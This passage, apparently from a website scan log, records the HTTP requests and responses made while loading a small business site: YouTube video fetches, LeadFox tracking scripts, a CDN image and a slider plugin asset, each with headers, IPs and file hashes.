MUYHeDR4CIBHHq4TFD9K86xo5hByCSHkpK_8ohqiR0RB_C86xBk8y&sq=0&rn=3&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr1---sn-5goeen7y.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 May 2007 10:26:10 GMT
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 1223
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Restrict-Formats-Hint: None
X-Content-Type-Options: nosniff
Server: gvs 1.0
app.leadfox.co/js/psl.min.js?_=1586443542474
172.67.71.4 200 OK 40 kB URL HTTP/2 app.leadfox.co/js/psl.min.js?_=1586443542474
IP 172.67.71.4:0
File type Unicode text, UTF-8 text, with very long lines (65191)
Hash c2b7756970a7f9157dfb4caff5f67c70
0439d203105d82870c2a7b7d3d4569b4f2b77fae
5f7cf87f77c27e95101c02de18f4d37b864911a9a76564133b1ed29377039148
GET /js/psl.min.js?_=1586443542474 HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:41 GMT
content-type: application/javascript; charset=UTF-8
last-modified: Tue, 20 Sep 2022 17:43:13 GMT
etag: W/"1ef70-5e91f5cc18e40-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 11
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UyGy2xmGDCHDsN7wlxPXFj0RIPXh%2FM15DknIa6rwUqTaoobuc3wpdKl8ot%2Fk8HRIxDbAuPhjLZB7ZFCSICeXz0RC4UQO02DbATLvR63AAB6VWz0V1Xc70%2Bm3Jl%2FH6D6k"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006e50eefb4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
rr2---sn-5hne6nz6.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgVoFAc8IZ6WgDA7ywSZMlCEjIWoUrxR3bWNWV35cJP6ICIEOw7nZD6UASlagCfBRY796ihhO1PdizVAq_IqWNKb5x&range=0-11538&rn=5&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
74.125.100.199200 OK 12 kB URL HTTP/1.1 rr2---sn-5hne6nz6.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgVoFAc8IZ6WgDA7ywSZMlCEjIWoUrxR3bWNWV35cJP6ICIEOw7nZD6UASlagCfBRY796ihhO1PdizVAq_IqWNKb5x&range=0-11538&rn=5&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 74.125.100.199:0
File type WebM\012- EBML file, creator webmB\20\012- data
Hash 6a3011b34ab1a46aa182311e49ccd48a
a13b5984827dc2a07b2a263f2268acfca63ced8d
930238a78091f2fea88c806463b1acee8616030fe8c1e589b5ad484c1e39b7a9
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgVoFAc8IZ6WgDA7ywSZMlCEjIWoUrxR3bWNWV35cJP6ICIEOw7nZD6UASlagCfBRY796ihhO1PdizVAq_IqWNKb5x&range=0-11538&rn=5&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr2---sn-5hne6nz6.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Last-Modified: Mon, 05 Aug 2019 07:35:29 GMT
Content-Type: audio/webm
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 11539
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: gvs 1.0
rr2---sn-5hne6nz6.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgUwtqN2vLOPpKcTBRn7C63niO3-wSI6trWmC3hj8pzRQCIQD5y8_PuAodT4jPw_QtH2uWGhS6qSDA1QUeesfbe8MwWg%3D%3D&sq=0&rn=6&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
74.125.100.199200 OK 288 B URL HTTP/1.1 rr2---sn-5hne6nz6.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgUwtqN2vLOPpKcTBRn7C63niO3-wSI6trWmC3hj8pzRQCIQD5y8_PuAodT4jPw_QtH2uWGhS6qSDA1QUeesfbe8MwWg%3D%3D&sq=0&rn=6&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 74.125.100.199:0
File type WebM\012- EBML file, creator webmB\20\012- data
Hash 663ec483caa7e0e51b0d9bab0adf4577
7a0e0db43f87a2ada947662652ec261f356137af
eeb988daa8cdc427846fddc5ff7e10af6131257414ca59565854765846625c8e
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgUwtqN2vLOPpKcTBRn7C63niO3-wSI6trWmC3hj8pzRQCIQD5y8_PuAodT4jPw_QtH2uWGhS6qSDA1QUeesfbe8MwWg%3D%3D&sq=0&rn=6&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr2---sn-5hne6nz6.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Last-Modified: Thu, 15 Sep 2022 13:27:33 GMT
Content-Type: video/webm
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Transfer-Encoding: chunked
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Restrict-Formats-Hint: None
X-Content-Type-Options: nosniff
Server: gvs 1.0
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fab5a64d4-8802-4886-ab88-03c39eb96f1a.jpeg
34.120.237.76 200 OK 5.2 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fab5a64d4-8802-4886-ab88-03c39eb96f1a.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 5a21b393fc4213d090f794f3eeee2333
cf334c1fc3191c5dcafaa2df55f62a10e16fda69
43553a352e6d7c8108bd5152d1c949d8acfb922344a00f8c77c986e2d8f665d9
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fab5a64d4-8802-4886-ab88-03c39eb96f1a.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
content-length: 5174
x-amzn-requestid: 19cef827-7a71-4789-ae2f-03861f7d65c1
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YsvkiG9BoAMFqRA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63282c83-695865cd7f0a236300a179cb;Sampled=0
x-amzn-remapped-date: Mon, 19 Sep 2022 08:46:59 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: pt-UpDrev8YQvpm0E3xWMpkUSsxo80_jlCq1jJ0ePrpLb9rE7_kQ8w==
via: 1.1 5ab5dc09da67e3ea794ec8a82992cc88.cloudfront.net (CloudFront), 1.1 ebe4011a81a36e2bf678f69ce1711330.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 22:20:37 GMT
age: 21789
etag: "cf334c1fc3191c5dcafaa2df55f62a10e16fda69"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/admin/assets/images/dummy.png
72.167.59.18 200 OK 0 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/admin/assets/images/dummy.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
GET /wp-content/plugins/revslider/admin/assets/images/dummy.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:01 GMT
etag: "1560c63-49-583d3b4f75740"
accept-ranges: bytes
content-length: 73
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.youtube.com/iframe_api
142.250.74.174 200 OK 0 B URL HTTP/2 www.youtube.com/iframe_api
IP 142.250.74.174:0
GET /iframe_api HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
x-content-type-options: nosniff
expires: Wed, 21 Sep 2022 04:23:42 GMT
date: Wed, 21 Sep 2022 04:23:42 GMT
cache-control: private, max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=31536000
cross-origin-resource-policy: cross-origin
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
cross-origin-opener-policy-report-only: same-origin; report-to="youtube_main"
report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
content-encoding: br
server: ESF
x-xss-protection: 0
set-cookie: YSC=RDk9idXXDns; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none
VISITOR_INFO1_LIVE=knNK5l6duKg; Domain=.youtube.com; Expires=Mon, 20-Mar-2023 04:23:42 GMT; Path=/; Secure; HttpOnly; SameSite=none
CONSENT=PENDING+848; expires=Fri, 20-Sep-2024 04:23:42 GMT; path=/; domain=.youtube.com; Secure
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
app.leadfox.co/service/track/init/
172.67.71.4 200 OK 0 B URL HTTP/2 app.leadfox.co/service/track/init/
IP 172.67.71.4:0
POST /service/track/init/ HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 306
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:43 GMT
content-type: application/json
access-control-allow-origin: https://www.comm2po.ca
x-kong-upstream-latency: 171
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=deFljyzz90FH93VYaeJgrO6bcawCw%2FoETWhf8hdiLlyCrNWhb4qdZBHwHd2KI4C0Pt1lw%2BGujMfltqvritxsyzoGCzDl0qMEFlasqSIjwaYqxCntpmfXqYbf3VO8NVN0"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006ed2c50b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
app.leadfox.co/js/jquery.initialize.min.js?_=1586443542474
172.67.71.4 200 OK 0 B URL HTTP/2 app.leadfox.co/js/jquery.initialize.min.js?_=1586443542474
IP 172.67.71.4:0
GET /js/jquery.initialize.min.js?_=1586443542474 HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:41 GMT
content-type: application/javascript; charset=UTF-8
last-modified: Tue, 20 Sep 2022 17:43:13 GMT
etag: W/"c1f-5e91f5cc18e40-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 1
x-kong-proxy-latency: 1
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q3djX1e4YpyGlpqvEKR08Bnn9kUZzCZvLolw5JB1ibPlGcwhZXaxFFOM2YdnPAGTEhtFavcHOTVz5cRtqEUM%2Bf0zke0ssmBg9RlN2Dl22nFaI6SJrMOOujaxlwKnlHRW"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006e3ee0ab4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
app.leadfox.co/js/api/leadfox.js
172.67.71.4 200 OK 0 B URL HTTP/2 app.leadfox.co/js/api/leadfox.js
IP 172.67.71.4:0
GET /js/api/leadfox.js HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:39 GMT
content-type: application/javascript; charset=UTF-8
last-modified: Tue, 20 Sep 2022 17:43:22 GMT
etag: W/"66d1-5e91f5d4ae280-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 3
x-kong-proxy-latency: 1
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=quyhKOO1mFuGXi84JAxMqkcutjaaDQohbKX66jXWVEGW8pcsQokftyjMWCqEuil909vS2pCBcWhAWh2AWXuOUHkeT9yTGvb4%2F1onrlDw1EJ068i6F6aOf0fSTRH%2BZGWu"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006d57d58b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
